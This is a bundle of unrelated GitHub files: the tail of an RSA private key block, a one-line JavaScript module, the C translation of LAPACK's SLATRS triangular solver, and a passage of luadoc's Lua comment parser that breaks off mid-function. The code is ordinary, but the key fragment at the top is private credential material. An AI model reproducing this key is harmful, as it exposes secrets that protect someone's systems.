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
-----END RSA PRIVATE KEY-----
|
{
"pile_set_name": "Github"
}
|
define( [
"./arr"
], function( arr ) {
"use strict";
return arr.slice;
} );
|
{
"pile_set_name": "Github"
}
|
/* slatrs.f -- translated by f2c (version 20061008).
You must link the resulting object file with libf2c:
on Microsoft Windows system, link with libf2c.lib;
on Linux or Unix systems, link with .../path/to/libf2c.a -lm
or, if you install libf2c.a in a standard place, with -lf2c -lm
-- in that order, at the end of the command line, as in
cc *.o -lf2c -lm
Source for libf2c is in /netlib/f2c/libf2c.zip, e.g.,
http://www.netlib.org/f2c/libf2c.zip
*/
#include "f2c.h"
#include "blaswrap.h"
/* Table of constant values */
static integer c__1 = 1;
static real c_b36 = .5f;
/* Subroutine */ int slatrs_(char *uplo, char *trans, char *diag, char *
normin, integer *n, real *a, integer *lda, real *x, real *scale, real
*cnorm, integer *info)
{
/* System generated locals */
integer a_dim1, a_offset, i__1, i__2, i__3;
real r__1, r__2, r__3;
/* Local variables */
integer i__, j;
real xj, rec, tjj;
integer jinc;
real xbnd;
integer imax;
real tmax, tjjs;
extern doublereal sdot_(integer *, real *, integer *, real *, integer *);
real xmax, grow, sumj;
extern logical lsame_(char *, char *);
extern /* Subroutine */ int sscal_(integer *, real *, real *, integer *);
real tscal, uscal;
integer jlast;
extern doublereal sasum_(integer *, real *, integer *);
logical upper;
extern /* Subroutine */ int saxpy_(integer *, real *, real *, integer *,
real *, integer *), strsv_(char *, char *, char *, integer *,
real *, integer *, real *, integer *);
extern doublereal slamch_(char *);
extern /* Subroutine */ int xerbla_(char *, integer *);
real bignum;
extern integer isamax_(integer *, real *, integer *);
logical notran;
integer jfirst;
real smlnum;
logical nounit;
/* -- LAPACK auxiliary routine (version 3.2) -- */
/* Univ. of Tennessee, Univ. of California Berkeley and NAG Ltd.. */
/* November 2006 */
/* .. Scalar Arguments .. */
/* .. */
/* .. Array Arguments .. */
/* .. */
/* Purpose */
/* ======= */
/* SLATRS solves one of the triangular systems */
/* A *x = s*b or A'*x = s*b */
/* with scaling to prevent overflow. Here A is an upper or lower */
/* triangular matrix, A' denotes the transpose of A, x and b are */
/* n-element vectors, and s is a scaling factor, usually less than */
/* or equal to 1, chosen so that the components of x will be less than */
/* the overflow threshold. If the unscaled problem will not cause */
/* overflow, the Level 2 BLAS routine STRSV is called. If the matrix A */
/* is singular (A(j,j) = 0 for some j), then s is set to 0 and a */
/* non-trivial solution to A*x = 0 is returned. */
/* Arguments */
/* ========= */
/* UPLO (input) CHARACTER*1 */
/* Specifies whether the matrix A is upper or lower triangular. */
/* = 'U': Upper triangular */
/* = 'L': Lower triangular */
/* TRANS (input) CHARACTER*1 */
/* Specifies the operation applied to A. */
/* = 'N': Solve A * x = s*b (No transpose) */
/* = 'T': Solve A'* x = s*b (Transpose) */
/* = 'C': Solve A'* x = s*b (Conjugate transpose = Transpose) */
/* DIAG (input) CHARACTER*1 */
/* Specifies whether or not the matrix A is unit triangular. */
/* = 'N': Non-unit triangular */
/* = 'U': Unit triangular */
/* NORMIN (input) CHARACTER*1 */
/* Specifies whether CNORM has been set or not. */
/* = 'Y': CNORM contains the column norms on entry */
/* = 'N': CNORM is not set on entry. On exit, the norms will */
/* be computed and stored in CNORM. */
/* N (input) INTEGER */
/* The order of the matrix A. N >= 0. */
/* A (input) REAL array, dimension (LDA,N) */
/* The triangular matrix A. If UPLO = 'U', the leading n by n */
/* upper triangular part of the array A contains the upper */
/* triangular matrix, and the strictly lower triangular part of */
/* A is not referenced. If UPLO = 'L', the leading n by n lower */
/* triangular part of the array A contains the lower triangular */
/* matrix, and the strictly upper triangular part of A is not */
/* referenced. If DIAG = 'U', the diagonal elements of A are */
/* also not referenced and are assumed to be 1. */
/* LDA (input) INTEGER */
/* The leading dimension of the array A. LDA >= max (1,N). */
/* X (input/output) REAL array, dimension (N) */
/* On entry, the right hand side b of the triangular system. */
/* On exit, X is overwritten by the solution vector x. */
/* SCALE (output) REAL */
/* The scaling factor s for the triangular system */
/* A * x = s*b or A'* x = s*b. */
/* If SCALE = 0, the matrix A is singular or badly scaled, and */
/* the vector x is an exact or approximate solution to A*x = 0. */
/* CNORM (input or output) REAL array, dimension (N) */
/* If NORMIN = 'Y', CNORM is an input argument and CNORM(j) */
/* contains the norm of the off-diagonal part of the j-th column */
/* of A. If TRANS = 'N', CNORM(j) must be greater than or equal */
/* to the infinity-norm, and if TRANS = 'T' or 'C', CNORM(j) */
/* must be greater than or equal to the 1-norm. */
/* If NORMIN = 'N', CNORM is an output argument and CNORM(j) */
/* returns the 1-norm of the offdiagonal part of the j-th column */
/* of A. */
/* INFO (output) INTEGER */
/* = 0: successful exit */
/* < 0: if INFO = -k, the k-th argument had an illegal value */
/* Further Details */
/* ======= ======= */
/* A rough bound on x is computed; if that is less than overflow, STRSV */
/* is called, otherwise, specific code is used which checks for possible */
/* overflow or divide-by-zero at every operation. */
/* A columnwise scheme is used for solving A*x = b. The basic algorithm */
/* if A is lower triangular is */
/* x[1:n] := b[1:n] */
/* for j = 1, ..., n */
/* x(j) := x(j) / A(j,j) */
/* x[j+1:n] := x[j+1:n] - x(j) * A[j+1:n,j] */
/* end */
/* Define bounds on the components of x after j iterations of the loop: */
/* M(j) = bound on x[1:j] */
/* G(j) = bound on x[j+1:n] */
/* Initially, let M(0) = 0 and G(0) = max{x(i), i=1,...,n}. */
/* Then for iteration j+1 we have */
/* M(j+1) <= G(j) / | A(j+1,j+1) | */
/* G(j+1) <= G(j) + M(j+1) * | A[j+2:n,j+1] | */
/* <= G(j) ( 1 + CNORM(j+1) / | A(j+1,j+1) | ) */
/* where CNORM(j+1) is greater than or equal to the infinity-norm of */
/* column j+1 of A, not counting the diagonal. Hence */
/* G(j) <= G(0) product ( 1 + CNORM(i) / | A(i,i) | ) */
/* 1<=i<=j */
/* and */
/* |x(j)| <= ( G(0) / |A(j,j)| ) product ( 1 + CNORM(i) / |A(i,i)| ) */
/* 1<=i< j */
/* Since |x(j)| <= M(j), we use the Level 2 BLAS routine STRSV if the */
/* reciprocal of the largest M(j), j=1,..,n, is larger than */
/* max(underflow, 1/overflow). */
/* The bound on x(j) is also used to determine when a step in the */
/* columnwise method can be performed without fear of overflow. If */
/* the computed bound is greater than a large constant, x is scaled to */
/* prevent overflow, but if the bound overflows, x is set to 0, x(j) to */
/* 1, and scale to 0, and a non-trivial solution to A*x = 0 is found. */
/* Similarly, a row-wise scheme is used to solve A'*x = b. The basic */
/* algorithm for A upper triangular is */
/* for j = 1, ..., n */
/* x(j) := ( b(j) - A[1:j-1,j]' * x[1:j-1] ) / A(j,j) */
/* end */
/* We simultaneously compute two bounds */
/* G(j) = bound on ( b(i) - A[1:i-1,i]' * x[1:i-1] ), 1<=i<=j */
/* M(j) = bound on x(i), 1<=i<=j */
/* The initial values are G(0) = 0, M(0) = max{b(i), i=1,..,n}, and we */
/* add the constraint G(j) >= G(j-1) and M(j) >= M(j-1) for j >= 1. */
/* Then the bound on x(j) is */
/* M(j) <= M(j-1) * ( 1 + CNORM(j) ) / | A(j,j) | */
/* <= M(0) * product ( ( 1 + CNORM(i) ) / |A(i,i)| ) */
/* 1<=i<=j */
/* and we can safely call STRSV if 1/M(n) and 1/G(n) are both greater */
/* than max(underflow, 1/overflow). */
/* ===================================================================== */
/* .. Parameters .. */
/* .. */
/* .. Local Scalars .. */
/* .. */
/* .. External Functions .. */
/* .. */
/* .. External Subroutines .. */
/* .. */
/* .. Intrinsic Functions .. */
/* .. */
/* .. Executable Statements .. */
/* Parameter adjustments */
a_dim1 = *lda;
a_offset = 1 + a_dim1;
a -= a_offset;
--x;
--cnorm;
/* Function Body */
*info = 0;
upper = lsame_(uplo, "U");
notran = lsame_(trans, "N");
nounit = lsame_(diag, "N");
/* Test the input parameters. */
if (! upper && ! lsame_(uplo, "L")) {
*info = -1;
} else if (! notran && ! lsame_(trans, "T") && !
lsame_(trans, "C")) {
*info = -2;
} else if (! nounit && ! lsame_(diag, "U")) {
*info = -3;
} else if (! lsame_(normin, "Y") && ! lsame_(normin,
"N")) {
*info = -4;
} else if (*n < 0) {
*info = -5;
} else if (*lda < max(1,*n)) {
*info = -7;
}
if (*info != 0) {
i__1 = -(*info);
xerbla_("SLATRS", &i__1);
return 0;
}
/* Quick return if possible */
if (*n == 0) {
return 0;
}
/* Determine machine dependent parameters to control overflow. */
smlnum = slamch_("Safe minimum") / slamch_("Precision");
bignum = 1.f / smlnum;
*scale = 1.f;
if (lsame_(normin, "N")) {
/* Compute the 1-norm of each column, not including the diagonal. */
if (upper) {
/* A is upper triangular. */
i__1 = *n;
for (j = 1; j <= i__1; ++j) {
i__2 = j - 1;
cnorm[j] = sasum_(&i__2, &a[j * a_dim1 + 1], &c__1);
/* L10: */
}
} else {
/* A is lower triangular. */
i__1 = *n - 1;
for (j = 1; j <= i__1; ++j) {
i__2 = *n - j;
cnorm[j] = sasum_(&i__2, &a[j + 1 + j * a_dim1], &c__1);
/* L20: */
}
cnorm[*n] = 0.f;
}
}
/* Scale the column norms by TSCAL if the maximum element in CNORM is */
/* greater than BIGNUM. */
imax = isamax_(n, &cnorm[1], &c__1);
tmax = cnorm[imax];
if (tmax <= bignum) {
tscal = 1.f;
} else {
tscal = 1.f / (smlnum * tmax);
sscal_(n, &tscal, &cnorm[1], &c__1);
}
/* Compute a bound on the computed solution vector to see if the */
/* Level 2 BLAS routine STRSV can be used. */
j = isamax_(n, &x[1], &c__1);
xmax = (r__1 = x[j], dabs(r__1));
xbnd = xmax;
if (notran) {
/* Compute the growth in A * x = b. */
if (upper) {
jfirst = *n;
jlast = 1;
jinc = -1;
} else {
jfirst = 1;
jlast = *n;
jinc = 1;
}
if (tscal != 1.f) {
grow = 0.f;
goto L50;
}
if (nounit) {
/* A is non-unit triangular. */
/* Compute GROW = 1/G(j) and XBND = 1/M(j). */
/* Initially, G(0) = max{x(i), i=1,...,n}. */
grow = 1.f / dmax(xbnd,smlnum);
xbnd = grow;
i__1 = jlast;
i__2 = jinc;
for (j = jfirst; i__2 < 0 ? j >= i__1 : j <= i__1; j += i__2) {
/* Exit the loop if the growth factor is too small. */
if (grow <= smlnum) {
goto L50;
}
/* M(j) = G(j-1) / abs(A(j,j)) */
tjj = (r__1 = a[j + j * a_dim1], dabs(r__1));
/* Computing MIN */
r__1 = xbnd, r__2 = dmin(1.f,tjj) * grow;
xbnd = dmin(r__1,r__2);
if (tjj + cnorm[j] >= smlnum) {
/* G(j) = G(j-1)*( 1 + CNORM(j) / abs(A(j,j)) ) */
grow *= tjj / (tjj + cnorm[j]);
} else {
/* G(j) could overflow, set GROW to 0. */
grow = 0.f;
}
/* L30: */
}
grow = xbnd;
} else {
/* A is unit triangular. */
/* Compute GROW = 1/G(j), where G(0) = max{x(i), i=1,...,n}. */
/* Computing MIN */
r__1 = 1.f, r__2 = 1.f / dmax(xbnd,smlnum);
grow = dmin(r__1,r__2);
i__2 = jlast;
i__1 = jinc;
for (j = jfirst; i__1 < 0 ? j >= i__2 : j <= i__2; j += i__1) {
/* Exit the loop if the growth factor is too small. */
if (grow <= smlnum) {
goto L50;
}
/* G(j) = G(j-1)*( 1 + CNORM(j) ) */
grow *= 1.f / (cnorm[j] + 1.f);
/* L40: */
}
}
L50:
;
} else {
/* Compute the growth in A' * x = b. */
if (upper) {
jfirst = 1;
jlast = *n;
jinc = 1;
} else {
jfirst = *n;
jlast = 1;
jinc = -1;
}
if (tscal != 1.f) {
grow = 0.f;
goto L80;
}
if (nounit) {
/* A is non-unit triangular. */
/* Compute GROW = 1/G(j) and XBND = 1/M(j). */
/* Initially, M(0) = max{x(i), i=1,...,n}. */
grow = 1.f / dmax(xbnd,smlnum);
xbnd = grow;
i__1 = jlast;
i__2 = jinc;
for (j = jfirst; i__2 < 0 ? j >= i__1 : j <= i__1; j += i__2) {
/* Exit the loop if the growth factor is too small. */
if (grow <= smlnum) {
goto L80;
}
/* G(j) = max( G(j-1), M(j-1)*( 1 + CNORM(j) ) ) */
xj = cnorm[j] + 1.f;
/* Computing MIN */
r__1 = grow, r__2 = xbnd / xj;
grow = dmin(r__1,r__2);
/* M(j) = M(j-1)*( 1 + CNORM(j) ) / abs(A(j,j)) */
tjj = (r__1 = a[j + j * a_dim1], dabs(r__1));
if (xj > tjj) {
xbnd *= tjj / xj;
}
/* L60: */
}
grow = dmin(grow,xbnd);
} else {
/* A is unit triangular. */
/* Compute GROW = 1/G(j), where G(0) = max{x(i), i=1,...,n}. */
/* Computing MIN */
r__1 = 1.f, r__2 = 1.f / dmax(xbnd,smlnum);
grow = dmin(r__1,r__2);
i__2 = jlast;
i__1 = jinc;
for (j = jfirst; i__1 < 0 ? j >= i__2 : j <= i__2; j += i__1) {
/* Exit the loop if the growth factor is too small. */
if (grow <= smlnum) {
goto L80;
}
/* G(j) = ( 1 + CNORM(j) )*G(j-1) */
xj = cnorm[j] + 1.f;
grow /= xj;
/* L70: */
}
}
L80:
;
}
if (grow * tscal > smlnum) {
/* Use the Level 2 BLAS solve if the reciprocal of the bound on */
/* elements of X is not too small. */
strsv_(uplo, trans, diag, n, &a[a_offset], lda, &x[1], &c__1);
} else {
/* Use a Level 1 BLAS solve, scaling intermediate results. */
if (xmax > bignum) {
/* Scale X so that its components are less than or equal to */
/* BIGNUM in absolute value. */
*scale = bignum / xmax;
sscal_(n, scale, &x[1], &c__1);
xmax = bignum;
}
if (notran) {
/* Solve A * x = b */
i__1 = jlast;
i__2 = jinc;
for (j = jfirst; i__2 < 0 ? j >= i__1 : j <= i__1; j += i__2) {
/* Compute x(j) = b(j) / A(j,j), scaling x if necessary. */
xj = (r__1 = x[j], dabs(r__1));
if (nounit) {
tjjs = a[j + j * a_dim1] * tscal;
} else {
tjjs = tscal;
if (tscal == 1.f) {
goto L95;
}
}
tjj = dabs(tjjs);
if (tjj > smlnum) {
/* abs(A(j,j)) > SMLNUM: */
if (tjj < 1.f) {
if (xj > tjj * bignum) {
/* Scale x by 1/b(j). */
rec = 1.f / xj;
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
xmax *= rec;
}
}
x[j] /= tjjs;
xj = (r__1 = x[j], dabs(r__1));
} else if (tjj > 0.f) {
/* 0 < abs(A(j,j)) <= SMLNUM: */
if (xj > tjj * bignum) {
/* Scale x by (1/abs(x(j)))*abs(A(j,j))*BIGNUM */
/* to avoid overflow when dividing by A(j,j). */
rec = tjj * bignum / xj;
if (cnorm[j] > 1.f) {
/* Scale by 1/CNORM(j) to avoid overflow when */
/* multiplying x(j) times column j. */
rec /= cnorm[j];
}
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
xmax *= rec;
}
x[j] /= tjjs;
xj = (r__1 = x[j], dabs(r__1));
} else {
/* A(j,j) = 0: Set x(1:n) = 0, x(j) = 1, and */
/* scale = 0, and compute a solution to A*x = 0. */
i__3 = *n;
for (i__ = 1; i__ <= i__3; ++i__) {
x[i__] = 0.f;
/* L90: */
}
x[j] = 1.f;
xj = 1.f;
*scale = 0.f;
xmax = 0.f;
}
L95:
/* Scale x if necessary to avoid overflow when adding a */
/* multiple of column j of A. */
if (xj > 1.f) {
rec = 1.f / xj;
if (cnorm[j] > (bignum - xmax) * rec) {
/* Scale x by 1/(2*abs(x(j))). */
rec *= .5f;
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
}
} else if (xj * cnorm[j] > bignum - xmax) {
/* Scale x by 1/2. */
sscal_(n, &c_b36, &x[1], &c__1);
*scale *= .5f;
}
if (upper) {
if (j > 1) {
/* Compute the update */
/* x(1:j-1) := x(1:j-1) - x(j) * A(1:j-1,j) */
i__3 = j - 1;
r__1 = -x[j] * tscal;
saxpy_(&i__3, &r__1, &a[j * a_dim1 + 1], &c__1, &x[1],
&c__1);
i__3 = j - 1;
i__ = isamax_(&i__3, &x[1], &c__1);
xmax = (r__1 = x[i__], dabs(r__1));
}
} else {
if (j < *n) {
/* Compute the update */
/* x(j+1:n) := x(j+1:n) - x(j) * A(j+1:n,j) */
i__3 = *n - j;
r__1 = -x[j] * tscal;
saxpy_(&i__3, &r__1, &a[j + 1 + j * a_dim1], &c__1, &
x[j + 1], &c__1);
i__3 = *n - j;
i__ = j + isamax_(&i__3, &x[j + 1], &c__1);
xmax = (r__1 = x[i__], dabs(r__1));
}
}
/* L100: */
}
} else {
/* Solve A' * x = b */
i__2 = jlast;
i__1 = jinc;
for (j = jfirst; i__1 < 0 ? j >= i__2 : j <= i__2; j += i__1) {
/* Compute x(j) = b(j) - sum A(k,j)*x(k). */
/* k<>j */
xj = (r__1 = x[j], dabs(r__1));
uscal = tscal;
rec = 1.f / dmax(xmax,1.f);
if (cnorm[j] > (bignum - xj) * rec) {
/* If x(j) could overflow, scale x by 1/(2*XMAX). */
rec *= .5f;
if (nounit) {
tjjs = a[j + j * a_dim1] * tscal;
} else {
tjjs = tscal;
}
tjj = dabs(tjjs);
if (tjj > 1.f) {
/* Divide by A(j,j) when scaling x if A(j,j) > 1. */
/* Computing MIN */
r__1 = 1.f, r__2 = rec * tjj;
rec = dmin(r__1,r__2);
uscal /= tjjs;
}
if (rec < 1.f) {
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
xmax *= rec;
}
}
sumj = 0.f;
if (uscal == 1.f) {
/* If the scaling needed for A in the dot product is 1, */
/* call SDOT to perform the dot product. */
if (upper) {
i__3 = j - 1;
sumj = sdot_(&i__3, &a[j * a_dim1 + 1], &c__1, &x[1],
&c__1);
} else if (j < *n) {
i__3 = *n - j;
sumj = sdot_(&i__3, &a[j + 1 + j * a_dim1], &c__1, &x[
j + 1], &c__1);
}
} else {
/* Otherwise, use in-line code for the dot product. */
if (upper) {
i__3 = j - 1;
for (i__ = 1; i__ <= i__3; ++i__) {
sumj += a[i__ + j * a_dim1] * uscal * x[i__];
/* L110: */
}
} else if (j < *n) {
i__3 = *n;
for (i__ = j + 1; i__ <= i__3; ++i__) {
sumj += a[i__ + j * a_dim1] * uscal * x[i__];
/* L120: */
}
}
}
if (uscal == tscal) {
/* Compute x(j) := ( x(j) - sumj ) / A(j,j) if 1/A(j,j) */
/* was not used to scale the dotproduct. */
x[j] -= sumj;
xj = (r__1 = x[j], dabs(r__1));
if (nounit) {
tjjs = a[j + j * a_dim1] * tscal;
} else {
tjjs = tscal;
if (tscal == 1.f) {
goto L135;
}
}
/* Compute x(j) = x(j) / A(j,j), scaling if necessary. */
tjj = dabs(tjjs);
if (tjj > smlnum) {
/* abs(A(j,j)) > SMLNUM: */
if (tjj < 1.f) {
if (xj > tjj * bignum) {
/* Scale X by 1/abs(x(j)). */
rec = 1.f / xj;
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
xmax *= rec;
}
}
x[j] /= tjjs;
} else if (tjj > 0.f) {
/* 0 < abs(A(j,j)) <= SMLNUM: */
if (xj > tjj * bignum) {
/* Scale x by (1/abs(x(j)))*abs(A(j,j))*BIGNUM. */
rec = tjj * bignum / xj;
sscal_(n, &rec, &x[1], &c__1);
*scale *= rec;
xmax *= rec;
}
x[j] /= tjjs;
} else {
/* A(j,j) = 0: Set x(1:n) = 0, x(j) = 1, and */
/* scale = 0, and compute a solution to A'*x = 0. */
i__3 = *n;
for (i__ = 1; i__ <= i__3; ++i__) {
x[i__] = 0.f;
/* L130: */
}
x[j] = 1.f;
*scale = 0.f;
xmax = 0.f;
}
L135:
;
} else {
/* Compute x(j) := x(j) / A(j,j) - sumj if the dot */
/* product has already been divided by 1/A(j,j). */
x[j] = x[j] / tjjs - sumj;
}
/* Computing MAX */
r__2 = xmax, r__3 = (r__1 = x[j], dabs(r__1));
xmax = dmax(r__2,r__3);
/* L140: */
}
}
*scale /= tscal;
}
/* Scale the column norms by 1/TSCAL for return. */
if (tscal != 1.f) {
r__1 = 1.f / tscal;
sscal_(n, &r__1, &cnorm[1], &c__1);
}
return 0;
/* End of SLATRS */
} /* slatrs_ */
|
{
"pile_set_name": "Github"
}
|
-------------------------------------------------------------------------------
-- @release $Id: standard.lua,v 1.39 2007/12/21 17:50:48 tomas Exp $
-------------------------------------------------------------------------------
local assert, pairs, tostring, type = assert, pairs, tostring, type
local io = require "io"
local lfs = require "lfs"
local luadoc = require "luadoc"
local util = require "luadoc.util"
local tags = require "luadoc.taglet.standard.tags"
local string = require "string"
local table = require "table"
module 'luadoc.taglet.standard'
-------------------------------------------------------------------------------
-- Creates an iterator for an array base on a class type.
-- @param t array to iterate over
-- @param class name of the class to iterate over
function class_iterator (t, class)
return function ()
local i = 1
return function ()
while t[i] and t[i].class ~= class do
i = i + 1
end
local v = t[i]
i = i + 1
return v
end
end
end
-- Patterns for function recognition
local identifiers_list_pattern = "%s*(.-)%s*"
local identifier_pattern = "[^%(%s]+"
local function_patterns = {
"^()%s*function%s*("..identifier_pattern..")%s*%("..identifiers_list_pattern.."%)",
"^%s*(local%s)%s*function%s*("..identifier_pattern..")%s*%("..identifiers_list_pattern.."%)",
"^()%s*("..identifier_pattern..")%s*%=%s*function%s*%("..identifiers_list_pattern.."%)",
}
-------------------------------------------------------------------------------
-- Checks if the line contains a function definition
-- @param line string with line text
-- @return function information or nil if no function definition found
local function check_function (line)
line = util.trim(line)
local info = table.foreachi(function_patterns, function (_, pattern)
local r, _, l, id, param = string.find(line, pattern)
if r ~= nil then
return {
name = id,
private = (l == "local"),
param = util.split("%s*,%s*", param),
}
end
end)
-- TODO: remove these assert's?
if info ~= nil then
assert(info.name, "function name undefined")
assert(info.param, string.format("undefined parameter list for function `%s'", info.name))
end
return info
end
-------------------------------------------------------------------------------
-- Checks if the line contains a module definition.
-- @param line string with line text
-- @param currentmodule module already found, if any
-- @return the name of the defined module, or nil if there is no module
-- definition
local function check_module (line, currentmodule)
line = util.trim(line)
-- module"x.y"
-- module'x.y'
-- module[[x.y]]
-- module("x.y")
-- module('x.y')
-- module([[x.y]])
-- module(...)
local r, _, modulename = string.find(line, "^module%s*[%s\"'(%[]+([^,\"')%]]+)")
if r then
-- found module definition
logger:debug(string.format("found module `%s'", modulename))
return modulename
end
return currentmodule
end
-------------------------------------------------------------------------------
-- Extracts summary information from a description. The first sentence of each
-- doc comment should be a summary sentence, containing a concise but complete
-- description of the item. It is important to write crisp and informative
-- initial sentences that can stand on their own
-- @param description text with item description
-- @return summary string or nil if description is nil
local function parse_summary (description)
-- summary is never nil...
description = description or ""
-- append an " " at the end to make the pattern work in all cases
description = description.." "
-- read until the first period followed by a space or tab
local summary = string.match(description, "(.-%.)[%s\t]")
-- if pattern did not find the first sentence, summary is the whole description
summary = summary or description
return summary
end
-------------------------------------------------------------------------------
-- @param f file handle
-- @param line current line being parsed
-- @param modulename module already found, if any
-- @return current line
-- @return code block
-- @return modulename if found
local function parse_code (f, line, modulename)
local code = {}
while line ~= nil do
if string.find(line, "^[\t ]*%-%-%-") then
-- reached another luadoc block, end this parsing
return line, code, modulename
else
-- look for a module definition
modulename = check_module(line, modulename)
table.insert(code, line)
line = f:read()
end
end
-- reached end of file
return line, code, modulename
end
-------------------------------------------------------------------------------
-- Parses the information inside a block comment
-- @param block block with comment field
-- @return block parameter
local function parse_comment (block, first_line)
-- get the first non-empty line of code
local code = table.foreachi(block.code, function(_, line)
if not util.line_empty(line) then
-- `local' declarations are ignored in two cases:
-- when the `nolocals' option is turned on; and
-- when the first block of a file is parsed (this is
-- necessary to avoid confusion between the top
-- local declarations and the `module' definition.
if (options.nolocals or first_line) and line:find"^%s*local" then
return
end
return line
end
end)
-- parse first line of code
if code ~= nil then
local func_info = check_function(code)
local module_name = check_module(code)
if func_info then
block.class = "function"
block.name = func_info.name
block.param = func_info.param
block.private = func_info.private
elseif module_name then
block.class = "module"
block.name = module_name
block.param = {}
else
block.param = {}
end
else
-- TODO: comment without any code. Does this means we are dealing
-- with a file comment?
end
-- parse @ tags
local currenttag = "description"
local currenttext
